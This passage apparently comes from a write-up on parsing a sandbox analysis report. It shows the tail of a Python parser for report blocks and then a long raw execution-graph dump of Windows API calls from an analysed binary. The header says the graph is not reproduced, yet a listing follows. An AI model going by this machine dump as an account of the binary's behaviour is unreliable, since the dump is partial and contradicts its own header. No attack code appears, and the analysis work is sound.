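    blocks: list[FunctionBlock] = []
    cur = FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := SCORE_RE.match(line):
            cur.uniqueness_score = float(m["score"])
            blocks.append(cur)
            cur = FunctionBlock()
        elif m := API_CALL_RE.match(line):
            args = tuple(m["args"].split(",")) if m["args"] else ()
            cur.api_calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif m := SOURCE_RE.match(line):
            cur.source_file = m["file"]
            cur.image_base = int(m["offset"], 16)
        elif m := FIELD_RE.match(line):
            # Page residue: the "Download File" link text is fused onto Associated lines.
            cur.fields[m["key"]] = m["value"].strip().removesuffix("Download File").strip()
    return blocks


def api_index(blocks: list[FunctionBlock]) -> dict[str, list[int]]:
    """Map each imported API name to the indices of the blocks whose function calls it."""
    index: dict[str, list[int]] = {}
    for i, b in enumerate(blocks):
        for call in b.api_calls:
            hits = index.setdefault(call.name, [])
            if i not in hits:
                hits.append(i)
    return index


if __name__ == "__main__":
    for i, b in enumerate(parse_blocks(SAMPLE_REPORT)):
        print(i, b.fields.get("API ID"), [hex(r) for r in b.call_site_rvas()])
```

Run against the full report text, `api_index` answers "which functions touch HeapAlloc / DuplicateHandle" without scrolling, and the RVAs line up with the dumped image when it is loaded at the base given in the Source File line.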

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:5.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:1783
                                                                                                                    Total number of Limit Nodes:42
                                                                                                                    execution_graph: node/edge listing of the interactive graph (1783 nodes, 42 limit nodes, entry node 16806 at 7ff789bc6be0) not reproduced here. The dumped text consists of node tokens "<id> <address> [symbol ...]" and edge tokens "<id>-><id>"; nodes whose callees were not expanded carry a "<N> API calls" summary instead of symbols. Symbols resolved in the listing: _pipe, _dup, _dup2, _close, _get_osfhandle, DuplicateHandle, GetProcessHeap, RtlAllocateHeap, HeapAlloc, memset, GetConsoleTitleW, SetConsoleTitleW, GetLastError, towupper, wcsncmp, wcschr, wcsrchr, _wcsnicmp, _wcsicmp, _vsnwprintf, _setjmp, longjmp, ??_V@YAXPEAX, RtlCaptureContext, RtlLookupFunctionEntry, InitializeProcThreadAttributeList, SetFilePointer, GetFileType, SearchPathW, GetEnvironmentVariableW, GetDriveTypeW, GetFileAttributesW, NeedCurrentDirectoryForExePathW, GetCommandLineW, rand, GetNumaHighestNodeNumber.
HeapReAlloc 17198->17201 17202 7ff789bcd54a iswspace 17198->17202 17203 7ff789bcd6ff iswspace 17198->17203 17206 7ff789bcd586 wcschr 17198->17206 17208 7ff789bcd668 17198->17208 17209 7ff789bcd759 wcschr 17198->17209 17211 7ff789bcd6c5 wcschr 17198->17211 17212 7ff789bdca5a wcschr 17198->17212 17199->17193 17200->17198 17201->17191 17204 7ff789bcd61d GetProcessHeap HeapSize 17201->17204 17202->17198 17205 7ff789bcd561 wcschr 17202->17205 17203->17198 17207 7ff789bcd712 wcschr 17203->17207 17204->17198 17205->17198 17206->17198 17207->17198 17210 7ff789bd8f80 7 API calls 17208->17210 17209->17198 17213 7ff789bcc741 17210->17213 17211->17198 17212->17198 17213->16933 17213->16937 17215 7ff789bcbd6f 17214->17215 17219 7ff789bcbda2 17214->17219 17215->17219 17378 7ff789beeaf0 17215->17378 17217 7ff789bdc4ab 17217->17219 17383 7ff789bc3240 17217->17383 17219->16946 17220 7ff789bdc4bc 17220->17219 17221 7ff789bc3240 166 API calls 17220->17221 17221->17220 17223 7ff789bccb63 17222->17223 17224 7ff789bccd90 166 API calls 17223->17224 17225 7ff789bcc848 17224->17225 17225->16927 17226 7ff789bccad4 17225->17226 17227 7ff789bccad9 17226->17227 17235 7ff789bccb05 17226->17235 17228 7ff789bccd90 166 API calls 17227->17228 17227->17235 17229 7ff789bdc722 17228->17229 17230 7ff789bdc72e GetConsoleTitleW 17229->17230 17229->17235 17231 7ff789bdc74a 17230->17231 17230->17235 17576 7ff789bcb6b0 17231->17576 17233 7ff789bdc7ec 17234 7ff789bcff70 2 API calls 17233->17234 17234->17235 17235->16927 17236 7ff789bdc7dd SetConsoleTitleW 17236->17233 17237 7ff789bdc778 17237->17233 17237->17236 17239 7ff789bd8574 ??_V@YAXPEAX 17238->17239 17240 7ff789bcc87c 17238->17240 17239->17240 17241 7ff789bd8f80 17240->17241 17244 7ff789bd8f89 17241->17244 17242 7ff789bd8fe0 RtlCaptureContext RtlLookupFunctionEntry 17245 7ff789bd9025 RtlVirtualUnwind 17242->17245 17246 7ff789bd9067 17242->17246 17243 7ff789bcc88e 17243->16881 17244->17242 17244->17243 17245->17246 17583 7ff789bd8fa4 
SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17246->17583 17250 7ff789bd9195 RtlVirtualUnwind 17249->17250 17251 7ff789bd91d7 17249->17251 17250->17251 17584 7ff789bd8fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17251->17584 17255 7ff789bcca40 17 API calls 17254->17255 17256 7ff789beec96 17255->17256 17257 7ff789beedf7 17256->17257 17260 7ff789bd081c 166 API calls 17256->17260 17258 7ff789beee16 17257->17258 17259 7ff789beee0a ??_V@YAXPEAX 17257->17259 17261 7ff789bd8f80 7 API calls 17258->17261 17259->17258 17262 7ff789beecca 17260->17262 17265 7ff789beee25 17261->17265 17263 7ff789beecd2 SetCurrentDirectoryW 17262->17263 17264 7ff789beecfb 17262->17264 17266 7ff789beedd4 17263->17266 17267 7ff789beece9 SetErrorMode 17263->17267 17268 7ff789bd498c 8 API calls 17264->17268 17265->16946 17270 7ff789bd417c 166 API calls 17266->17270 17267->17264 17269 7ff789beed89 SetCurrentDirectoryW 17268->17269 17271 7ff789beedc1 17269->17271 17272 7ff789beedac GetLastError 17269->17272 17270->17257 17271->17266 17274 7ff789beedc6 SetErrorMode 17271->17274 17273 7ff789bc3278 166 API calls 17272->17273 17273->17271 17274->17266 17276 7ff789bd9330 17275->17276 17282 7ff789bd9a6c 17276->17282 17278 7ff789bcca7b 17278->17180 17278->17181 17287 7ff789be6c5c 17279->17287 17283 7ff789bd9a86 malloc 17282->17283 17284 7ff789bd9a91 17283->17284 17285 7ff789bd9a77 17283->17285 17284->17278 17285->17283 17286 7ff789bd9a97 Concurrency::cancel_current_task 17285->17286 17286->17278 17290 7ff789be6a34 17287->17290 17291 7ff789be6a41 17290->17291 17298 7ff789be63fc 17291->17298 17293 7ff789be6b1d 17295 7ff789bd8f80 7 API calls 17293->17295 17296 7ff789be6b2e 17295->17296 17296->17176 17299 7ff789be6455 17298->17299 17300 7ff789be6461 17298->17300 17299->17300 17301 7ff789be6c5c 11 API calls 17299->17301 17302 7ff789be64f9 GetCurrentThreadId 17300->17302 17301->17300 17303 7ff789be6561 17302->17303 17304 
7ff789be65ea 17303->17304 17305 7ff789be65f5 IsDebuggerPresent 17303->17305 17306 7ff789be666c OutputDebugStringW 17304->17306 17308 7ff789be660b 17304->17308 17313 7ff789be5bf4 17304->17313 17305->17304 17306->17308 17308->17293 17309 7ff789be742c 17308->17309 17310 7ff789be7444 17309->17310 17311 7ff789be744a memset 17309->17311 17310->17311 17312 7ff789be7489 17311->17312 17316 7ff789be5c2e 17313->17316 17339 7ff789be5e13 17313->17339 17314 7ff789bd8f80 7 API calls 17315 7ff789be5e49 17314->17315 17315->17306 17317 7ff789be5ca7 FormatMessageW 17316->17317 17316->17339 17318 7ff789be5d1f 17317->17318 17319 7ff789be5cfc 17317->17319 17320 7ff789be66bc _vsnwprintf 17318->17320 17342 7ff789be66bc 17319->17342 17322 7ff789be5d1d 17320->17322 17323 7ff789be5d54 GetCurrentThreadId 17322->17323 17324 7ff789be66bc _vsnwprintf 17322->17324 17325 7ff789be66bc _vsnwprintf 17323->17325 17326 7ff789be5d51 17324->17326 17327 7ff789be5d91 17325->17327 17326->17323 17328 7ff789be66bc _vsnwprintf 17327->17328 17327->17339 17329 7ff789be5db9 17328->17329 17330 7ff789be5dd4 17329->17330 17332 7ff789be66bc _vsnwprintf 17329->17332 17331 7ff789be5def 17330->17331 17333 7ff789be66bc _vsnwprintf 17330->17333 17334 7ff789be5e15 17331->17334 17335 7ff789be5dff 17331->17335 17332->17330 17333->17331 17337 7ff789be5e2b 17334->17337 17338 7ff789be5e1d 17334->17338 17336 7ff789be66bc _vsnwprintf 17335->17336 17336->17339 17341 7ff789be66bc _vsnwprintf 17337->17341 17340 7ff789be66bc _vsnwprintf 17338->17340 17339->17314 17340->17339 17341->17339 17345 7ff789bd363c 17342->17345 17346 7ff789bd3664 17345->17346 17347 7ff789bd3671 17345->17347 17348 7ff789bd3684 _vsnwprintf 17346->17348 17347->17322 17348->17347 17350 7ff789bccd90 166 API calls 17349->17350 17351 7ff789bcb9a1 17350->17351 17352 7ff789bcb9a6 17351->17352 17353 7ff789bee91c 198 API calls 17351->17353 17352->17190 17354 7ff789bcb9b1 memset 17353->17354 17356 7ff789bcca40 17 API calls 17354->17356 17359 7ff789bcba4c 17356->17359 
17357 7ff789bdc3a8 17357->17357 17360 7ff789bcb998 199 API calls 17357->17360 17358 7ff789bcba80 wcschr 17358->17359 17361 7ff789bcbadb 17358->17361 17359->17357 17359->17358 17359->17361 17363 7ff789bcbaa0 wcschr 17359->17363 17365 7ff789bcbb05 17359->17365 17368 7ff789bcbb47 17359->17368 17367 7ff789bdc41a 17360->17367 17361->17357 17362 7ff789bcbcef GetFileAttributesW 17361->17362 17361->17365 17362->17365 17363->17359 17364 7ff789bc88a8 _wcsicmp 17375 7ff789bcbc46 17364->17375 17366 7ff789bcbb29 _wcsicmp 17365->17366 17365->17368 17366->17365 17368->17357 17368->17364 17369 7ff789bcbb6b 17368->17369 17369->17357 17371 7ff789bcbb92 17369->17371 17370 7ff789bcbc82 iswspace 17370->17369 17372 7ff789bcbc99 wcschr 17370->17372 17373 7ff789bcbbe2 ??_V@YAXPEAX 17371->17373 17374 7ff789bcbbee 17371->17374 17372->17369 17372->17375 17373->17374 17376 7ff789bd8f80 7 API calls 17374->17376 17375->17357 17375->17369 17375->17370 17377 7ff789bcbc01 17376->17377 17377->17190 17386 7ff789bc3410 17378->17386 17381 7ff789bcb998 207 API calls 17382 7ff789beeb2e 17381->17382 17382->17217 17403 7ff789bc32b0 17383->17403 17387 7ff789be12cd _ultoa GetACP 17386->17387 17388 7ff789bc345c FormatMessageW 17386->17388 17401 7ff789bd0460 17387->17401 17388->17387 17393 7ff789bc348b 17388->17393 17391 7ff789bc34b4 17394 7ff789bc34c4 FormatMessageW 17391->17394 17395 7ff789be121d GetProcessHeap HeapAlloc 17391->17395 17392 7ff789bc349d wcschr 17392->17391 17392->17393 17393->17391 17393->17392 17396 7ff789bc34ef 17394->17396 17395->17396 17400 7ff789be124f FormatMessageW GetProcessHeap RtlFreeHeap 17395->17400 17397 7ff789bd8f80 7 API calls 17396->17397 17399 7ff789bc34ff 17397->17399 17399->17381 17400->17387 17402 7ff789bd0472 MultiByteToWideChar 17401->17402 17439 7ff789bd3578 _get_osfhandle 17403->17439 17406 7ff789bc331d 17408 7ff789bc3410 18 API calls 17406->17408 17407 7ff789bc32f0 _get_osfhandle GetConsoleScreenBufferInfo 17407->17406 17422 7ff789bc333d 17408->17422 17409 
7ff789bc33a8 17411 7ff789bc33b0 17409->17411 17415 7ff789be11ff 17409->17415 17410 7ff789bc3368 WriteConsoleW 17413 7ff789be11cc GetLastError 17410->17413 17410->17422 17417 7ff789bd8f80 7 API calls 17411->17417 17413->17422 17414 7ff789be1057 GetConsoleScreenBufferInfo 17418 7ff789be1079 WriteConsoleW 17414->17418 17414->17422 17454 7ff789bd4c1c 17415->17454 17416 7ff789be11df GetLastError 17416->17409 17423 7ff789bc326c 17417->17423 17418->17422 17424 7ff789be10a8 9 API calls 17418->17424 17421 7ff789bc3400 17421->17416 17422->17409 17422->17410 17422->17413 17422->17414 17422->17416 17422->17421 17446 7ff789bd36ec _get_osfhandle 17422->17446 17423->17220 17424->17422 17425 7ff789be1181 17424->17425 17453 7ff789bebde4 EnterCriticalSection LeaveCriticalSection 17425->17453 17440 7ff789bd3599 GetFileType 17439->17440 17445 7ff789bc32e8 17439->17445 17443 7ff789bd35b1 17440->17443 17440->17445 17441 7ff789bde940 17442 7ff789bd35d2 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17442->17445 17443->17441 17443->17442 17444 7ff789bd35c3 GetStdHandle 17443->17444 17444->17442 17445->17406 17445->17407 17447 7ff789bde95c WriteFile 17446->17447 17450 7ff789bd3731 17446->17450 17448 7ff789bde980 WideCharToMultiByte WriteFile 17447->17448 17448->17450 17452 7ff789bd37a1 17448->17452 17449 7ff789bd3747 17451 7ff789bd374b WideCharToMultiByte WriteFile 17449->17451 17449->17452 17450->17448 17450->17449 17450->17452 17451->17452 17452->17422 17455 7ff789bd4c24 17454->17455 17457 7ff789bd4c2f exit 17455->17457 17458 7ff789bd4c50 17455->17458 17464 7ff789bd4cb0 17458->17464 17460 7ff789bd4c6c 17460->17455 17465 7ff789bd4cda 17464->17465 17468 7ff789bd4cfa 17464->17468 17466 7ff789bd8f80 7 API calls 17465->17466 17467 7ff789bd4c64 17466->17467 17467->17460 17470 7ff789bd3c24 17467->17470 17468->17465 17469 7ff789bdeefe realloc 17468->17469 17469->17465 17471 7ff789bd3c67 17470->17471 17472 7ff789bcca40 17 API calls 17471->17472 17517 7ff789bd412c 17471->17517 17474 
7ff789bd3c94 17472->17474 17473 7ff789bd8f80 7 API calls 17475 7ff789bd413e GetProcessHeap RtlFreeHeap 17473->17475 17476 7ff789bdec97 17474->17476 17535 7ff789bcb900 17474->17535 17475->17460 17477 7ff789bd855c ??_V@YAXPEAX 17476->17477 17479 7ff789bdeca1 17477->17479 17481 7ff789bd3cb8 GetCurrentDirectoryW towupper iswalpha 17483 7ff789bd3fb8 17481->17483 17484 7ff789bd3d68 17481->17484 17486 7ff789bd3fc6 GetLastError 17483->17486 17484->17483 17485 7ff789bd3d72 towupper GetFullPathNameW 17484->17485 17485->17486 17487 7ff789bd3dd3 17485->17487 17488 7ff789bd855c ??_V@YAXPEAX 17486->17488 17489 7ff789bd3fe0 17487->17489 17497 7ff789bd3de3 17487->17497 17488->17489 17491 7ff789bd855c ??_V@YAXPEAX 17489->17491 17490 7ff789bd40fe 17493 7ff789bd855c ??_V@YAXPEAX 17490->17493 17492 7ff789bd3ffb _local_unwind 17491->17492 17494 7ff789bd400c GetLastError 17492->17494 17495 7ff789bd4108 _local_unwind 17493->17495 17498 7ff789bd3e95 17494->17498 17499 7ff789bd4028 17494->17499 17496 7ff789bd3f98 17495->17496 17566 7ff789bcff70 17496->17566 17497->17490 17506 7ff789bd3e66 GetFileAttributesW 17497->17506 17502 7ff789bd3ecf 17498->17502 17539 7ff789bd2978 17498->17539 17499->17498 17501 7ff789bd4031 17499->17501 17507 7ff789bd855c ??_V@YAXPEAX 17501->17507 17504 7ff789bd3ed5 GetFileAttributesW 17502->17504 17505 7ff789bd3f08 17502->17505 17511 7ff789bd3efd 17504->17511 17512 7ff789bd4067 GetLastError 17504->17512 17513 7ff789bd3f1e SetCurrentDirectoryW 17505->17513 17519 7ff789bd3f46 17505->17519 17506->17494 17506->17498 17514 7ff789bd403b _local_unwind 17507->17514 17509 7ff789bd3ec7 17509->17502 17515 7ff789bd404c 17509->17515 17510 7ff789bd855c ??_V@YAXPEAX 17510->17517 17511->17505 17518 7ff789bd409d 17511->17518 17516 7ff789bd855c ??_V@YAXPEAX 17512->17516 17513->17519 17520 7ff789bd40b8 GetLastError 17513->17520 17514->17515 17525 7ff789bd855c ??_V@YAXPEAX 17515->17525 17521 7ff789bd408c _local_unwind 17516->17521 17517->17473 17522 7ff789bd855c ??_V@YAXPEAX 
17518->17522 17552 7ff789bd498c 17519->17552 17523 7ff789bd855c ??_V@YAXPEAX 17520->17523 17521->17518 17527 7ff789bd40a7 _local_unwind 17522->17527 17528 7ff789bd40d2 _local_unwind 17523->17528 17526 7ff789bd4056 _local_unwind 17525->17526 17526->17512 17527->17520 17530 7ff789bd40e3 17528->17530 17532 7ff789bd855c ??_V@YAXPEAX 17530->17532 17531 7ff789bd3f6f 17557 7ff789bd417c 17531->17557 17534 7ff789bd40ed _local_unwind 17532->17534 17534->17490 17536 7ff789bcb914 17535->17536 17536->17536 17537 7ff789bccd90 166 API calls 17536->17537 17538 7ff789bcb92a 17537->17538 17538->17476 17538->17481 17543 7ff789bd29b9 17539->17543 17540 7ff789bd2a1e FindFirstFileW 17541 7ff789bd2a44 FindClose 17540->17541 17545 7ff789bde3f7 17540->17545 17541->17543 17542 7ff789bd29ed 17546 7ff789bd8f80 7 API calls 17542->17546 17543->17540 17543->17542 17543->17543 17544 7ff789bd2aeb _wcsnicmp 17543->17544 17543->17545 17548 7ff789bde3d6 _wcsicmp 17543->17548 17549 7ff789bde404 memmove 17543->17549 17550 7ff789bd2a9d memmove 17543->17550 17544->17543 17545->17509 17547 7ff789bd2a02 17546->17547 17547->17509 17548->17543 17548->17545 17549->17545 17550->17543 17553 7ff789bd49ba SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 17552->17553 17555 7ff789bd49a4 17552->17555 17570 7ff789bd4a14 GetEnvironmentStringsW 17553->17570 17555->17553 17558 7ff789bd41d4 towupper 17557->17558 17559 7ff789bd41a8 GetCurrentDirectoryW 17557->17559 17561 7ff789bd081c 163 API calls 17558->17561 17560 7ff789bd41b9 17559->17560 17563 7ff789bd8f80 7 API calls 17560->17563 17562 7ff789bd4204 17561->17562 17562->17560 17564 7ff789bdecac towupper 17562->17564 17565 7ff789bd41c8 17563->17565 17565->17496 17567 7ff789bcff7c 17566->17567 17568 7ff789bcffdb 17566->17568 17567->17568 17569 7ff789bcffb5 GetProcessHeap RtlFreeHeap 17567->17569 17568->17510 17569->17568 17571 7ff789bd4a40 GetProcessHeap RtlAllocateHeap 17570->17571 17572 7ff789bd3f67 17570->17572 17574 7ff789bd4a9f FreeEnvironmentStringsW 17571->17574 
17575 7ff789bd4a91 memmove 17571->17575 17572->17530 17572->17531 17574->17572 17575->17574 17577 7ff789bcb6d0 GetProcessHeap HeapReAlloc 17576->17577 17578 7ff789bdc34c 17576->17578 17577->17578 17579 7ff789bcb6ff GetProcessHeap HeapSize 17577->17579 17580 7ff789bc3278 166 API calls 17578->17580 17582 7ff789bcb726 17579->17582 17581 7ff789bdc356 17580->17581 17581->17237 17582->17237 17586 7ff789bdecd4 GetLastError 17585->17586 17587 7ff789bd42ab UpdateProcThreadAttribute 17585->17587 17588 7ff789bdecee 17586->17588 17589 7ff789bdecf0 GetLastError 17587->17589 17590 7ff789bd42eb memset memset GetStartupInfoW 17587->17590 17694 7ff789be9eec 17589->17694 17669 7ff789bd3a90 17590->17669 17595 7ff789bcb900 166 API calls 17596 7ff789bd43bb 17595->17596 17597 7ff789bd43cc 17596->17597 17598 7ff789bd4638 _local_unwind 17596->17598 17599 7ff789bd4415 17597->17599 17600 7ff789bd43de wcsrchr 17597->17600 17598->17597 17681 7ff789bd5a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 17599->17681 17600->17599 17601 7ff789bd43f7 lstrcmpW 17600->17601 17601->17599 17603 7ff789bd4668 17601->17603 17682 7ff789be9044 17603->17682 17604 7ff789bd441a 17606 7ff789bd442a CreateProcessW 17604->17606 17607 7ff789bd4596 CreateProcessAsUserW 17604->17607 17608 7ff789bd448b 17606->17608 17607->17608 17609 7ff789bd4495 CloseHandle 17608->17609 17610 7ff789bd4672 GetLastError 17608->17610 17611 7ff789bd498c 8 API calls 17609->17611 17621 7ff789bd468d 17610->17621 17612 7ff789bd44c5 17611->17612 17614 7ff789bd44cd 17612->17614 17612->17621 17613 7ff789bd47a3 17613->16982 17614->17613 17632 7ff789bea250 33 API calls 17614->17632 17636 7ff789bd44f8 17614->17636 17615 7ff789bccd90 166 API calls 17618 7ff789bd4724 17615->17618 17616 7ff789bd5cb4 7 API calls 17620 7ff789bd4517 17616->17620 17617 7ff789bd461c 17623 7ff789bcff70 GetProcessHeap RtlFreeHeap 17617->17623 17622 7ff789bd472c _local_unwind 17618->17622 17625 7ff789bd473d 17618->17625 17619 7ff789bd47e1 CloseHandle 
17619->17617 17624 7ff789bd33f0 _vsnwprintf 17620->17624 17621->17614 17621->17615 17622->17625 17626 7ff789bd47fa DeleteProcThreadAttributeList 17623->17626 17627 7ff789bd4544 17624->17627 17633 7ff789bcff70 GetProcessHeap RtlFreeHeap 17625->17633 17628 7ff789bd8f80 7 API calls 17626->17628 17629 7ff789bd498c 8 API calls 17627->17629 17630 7ff789bd4820 17628->17630 17631 7ff789bd4558 17629->17631 17630->16982 17634 7ff789bd4564 17631->17634 17635 7ff789bd47ae 17631->17635 17632->17636 17637 7ff789bd475b _local_unwind 17633->17637 17638 7ff789bd498c 8 API calls 17634->17638 17639 7ff789bd33f0 _vsnwprintf 17635->17639 17636->17613 17636->17616 17641 7ff789bd4612 17636->17641 17637->17614 17640 7ff789bd4577 17638->17640 17639->17641 17640->17617 17642 7ff789bd457f 17640->17642 17641->17617 17641->17619 17643 7ff789bea920 210 API calls 17642->17643 17644 7ff789bd4584 17643->17644 17644->17617 17650 7ff789bc9737 17645->17650 17647 7ff789bc977d memset 17649 7ff789bcca40 17 API calls 17647->17649 17648 7ff789bccd90 166 API calls 17648->17650 17649->17650 17650->17647 17650->17648 17651 7ff789bdb76e 17650->17651 17652 7ff789bdb7b3 17650->17652 17653 7ff789bdb79a 17650->17653 17663 7ff789bc986d 17650->17663 17701 7ff789bcb364 17650->17701 17707 7ff789bd1fac memset 17650->17707 17734 7ff789bcce10 17650->17734 17784 7ff789bc96b4 17650->17784 17789 7ff789bd5920 17650->17789 17654 7ff789bc3278 166 API calls 17651->17654 17656 7ff789bd855c ??_V@YAXPEAX 17653->17656 17657 7ff789bdb787 17654->17657 17656->17652 17658 7ff789bdb795 17657->17658 17795 7ff789bee944 17657->17795 17803 7ff789be7694 17658->17803 17665 7ff789bc9880 ??_V@YAXPEAX 17663->17665 17666 7ff789bc988c 17663->17666 17665->17666 17667 7ff789bd8f80 7 API calls 17666->17667 17668 7ff789bc989d 17667->17668 17668->16982 17670 7ff789bd3aa4 17669->17670 17679 7ff789bd3b73 17669->17679 17670->17679 17696 7ff789bd09f4 17670->17696 17673 7ff789bcb900 166 API calls 17674 7ff789bd3ad0 17673->17674 17675 7ff789bd3ad8 wcsrchr 
17674->17675 17678 7ff789bd3af4 17674->17678 17675->17678 17676 7ff789bd3b66 17677 7ff789bcff70 2 API calls 17676->17677 17677->17679 17678->17676 17680 7ff789bd3b2d _wcsnicmp 17678->17680 17679->17595 17680->17678 17683 7ff789bd3a90 170 API calls 17682->17683 17684 7ff789be9064 17683->17684 17685 7ff789be9083 17684->17685 17686 7ff789be906e 17684->17686 17689 7ff789bccd90 166 API calls 17685->17689 17687 7ff789bd498c 8 API calls 17686->17687 17688 7ff789be9081 17687->17688 17688->17599 17690 7ff789be909b 17689->17690 17690->17688 17691 7ff789bd498c 8 API calls 17690->17691 17692 7ff789be90ec 17691->17692 17693 7ff789bcff70 2 API calls 17692->17693 17693->17688 17695 7ff789bded0a DeleteProcThreadAttributeList 17694->17695 17695->17588 17697 7ff789bd0a0b iswspace 17696->17697 17698 7ff789bd0a3c 17696->17698 17699 7ff789bd0a21 wcschr 17697->17699 17700 7ff789bd0a50 17697->17700 17698->17673 17699->17698 17699->17700 17700->17697 17700->17698 17700->17699 17702 7ff789bcca40 17 API calls 17701->17702 17703 7ff789bcb396 17702->17703 17704 7ff789be6d1c 14 API calls 17703->17704 17705 7ff789bcb3ca 17703->17705 17706 7ff789bdc27c 17704->17706 17705->17650 17709 7ff789bd203b 17707->17709 17708 7ff789bd20b0 17712 7ff789bd211c 17708->17712 17820 7ff789bd3060 17708->17820 17709->17708 17710 7ff789bd2094 17709->17710 17713 7ff789bd20a6 17710->17713 17714 7ff789bc3278 166 API calls 17710->17714 17712->17713 17809 7ff789bd2e44 17712->17809 17716 7ff789bd8f80 7 API calls 17713->17716 17714->17713 17717 7ff789bd2325 17716->17717 17717->17650 17718 7ff789bd2148 17718->17713 17814 7ff789bd2d70 17718->17814 17721 7ff789bcb900 166 API calls 17723 7ff789bd21d0 17721->17723 17722 7ff789bde04a ??_V@YAXPEAX 17722->17713 17723->17722 17724 7ff789bd221c wcsspn 17723->17724 17733 7ff789bd22a4 ??_V@YAXPEAX 17723->17733 17726 7ff789bcb900 166 API calls 17724->17726 17727 7ff789bd223b 17726->17727 17727->17722 17731 7ff789bd2252 17727->17731 17728 7ff789bd228f 17729 7ff789bcd3f0 223 API calls 
17728->17729 17729->17733 17730 7ff789bde06d wcschr 17730->17731 17731->17728 17731->17730 17732 7ff789bde090 towupper 17731->17732 17732->17728 17732->17731 17733->17713 17772 7ff789bcd0f8 17734->17772 17783 7ff789bcce5b 17734->17783 17735 7ff789bd8f80 7 API calls 17737 7ff789bcd10a 17735->17737 17736 7ff789bdc860 17738 7ff789bdc97c 17736->17738 17883 7ff789beee88 17736->17883 17737->17650 18001 7ff789bee9b4 17738->18001 17744 7ff789bdc99a 17747 7ff789bdc9b3 ??_V@YAXPEAX 17744->17747 17744->17772 17745 7ff789bdc882 EnterCriticalSection LeaveCriticalSection 17750 7ff789bcd0e3 17745->17750 17746 7ff789bdc95c 17746->17738 17751 7ff789bc96b4 186 API calls 17746->17751 17747->17772 17749 7ff789bcceaa _tell 17752 7ff789bcd208 _close 17749->17752 17750->17650 17751->17746 17752->17783 17753 7ff789bccd90 166 API calls 17753->17783 17754 7ff789bdc9d5 18013 7ff789bed610 17754->18013 17756 7ff789bcb900 166 API calls 17756->17783 17758 7ff789bdca07 17759 7ff789bee91c 198 API calls 17758->17759 17764 7ff789bdca0c 17759->17764 17760 7ff789bebfec 176 API calls 17761 7ff789bdc9f1 17760->17761 17763 7ff789bc3240 166 API calls 17761->17763 17762 7ff789bccf33 memset 17762->17783 17763->17758 17764->17650 17765 7ff789bcca40 17 API calls 17765->17783 17766 7ff789bcd184 wcschr 17766->17783 17768 7ff789bdc9c9 17770 7ff789bd855c ??_V@YAXPEAX 17768->17770 17769 7ff789bcd1a7 wcschr 17769->17783 17770->17772 17772->17735 17773 7ff789bd0a6c 273 API calls 17773->17783 17774 7ff789bcbe00 635 API calls 17774->17783 17776 7ff789bccfab _wcsicmp 17776->17783 17778 7ff789bcd003 GetConsoleOutputCP GetCPInfo 17779 7ff789bd04f4 3 API calls 17778->17779 17779->17783 17781 7ff789bd1fac 238 API calls 17781->17783 17782 7ff789bcd044 ??_V@YAXPEAX 17782->17783 17783->17736 17783->17744 17783->17750 17783->17753 17783->17754 17783->17756 17783->17762 17783->17765 17783->17766 17783->17768 17783->17769 17783->17772 17783->17773 17783->17774 17783->17776 17783->17781 17783->17782 17841 7ff789bd0494 
17783->17841 17854 7ff789bcdf60 17783->17854 17874 7ff789bd0580 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 17783->17874 17919 7ff789bebfec 17783->17919 17955 7ff789be778c 17783->17955 17986 7ff789bd3448 17783->17986 17991 7ff789bec738 17783->17991 17785 7ff789bdb6e2 RevertToSelf CloseHandle 17784->17785 17786 7ff789bc96c8 17784->17786 17787 7ff789bc96ce 17786->17787 17788 7ff789bc6a48 184 API calls 17786->17788 17787->17650 17788->17786 17790 7ff789bd5a12 17789->17790 17791 7ff789bd596c 17789->17791 17790->17650 17791->17790 17792 7ff789bd598d VirtualQuery 17791->17792 17792->17790 17794 7ff789bd59ad 17792->17794 17793 7ff789bd59b7 VirtualQuery 17793->17790 17793->17794 17794->17790 17794->17793 17796 7ff789bee954 17795->17796 17797 7ff789bee990 17795->17797 17799 7ff789beee88 390 API calls 17796->17799 17798 7ff789bee9b4 197 API calls 17797->17798 17800 7ff789bee995 longjmp 17798->17800 17801 7ff789bee964 17799->17801 17801->17797 17802 7ff789bc96b4 186 API calls 17801->17802 17802->17801 17804 7ff789be76a3 17803->17804 17805 7ff789be76b7 17804->17805 17807 7ff789bc96b4 186 API calls 17804->17807 17806 7ff789bee9b4 197 API calls 17805->17806 17808 7ff789be76bc longjmp 17806->17808 17807->17804 17810 7ff789bd9324 malloc 17809->17810 17811 7ff789bd2e7b 17810->17811 17812 7ff789bd2e83 memset 17811->17812 17813 7ff789bd2e90 17811->17813 17812->17813 17813->17718 17815 7ff789bd2da3 17814->17815 17816 7ff789bd2d89 17814->17816 17815->17816 17817 7ff789bd2dbc GetProcessHeap RtlFreeHeap 17815->17817 17819 7ff789bd21af 17816->17819 17830 7ff789bd2e0c 17816->17830 17817->17815 17817->17816 17819->17721 17834 7ff789bd1ea0 17820->17834 17822 7ff789bd3084 17823 7ff789bde4fc 17822->17823 17825 7ff789bd30b1 17822->17825 17824 7ff789bd417c 166 API calls 17823->17824 17829 7ff789bd311a 17824->17829 17826 7ff789bd30c8 SetErrorMode SetErrorMode GetFullPathNameW SetErrorMode 17825->17826 17827 7ff789bde557 17825->17827 17826->17829 17828 7ff789bd417c 166 API calls 
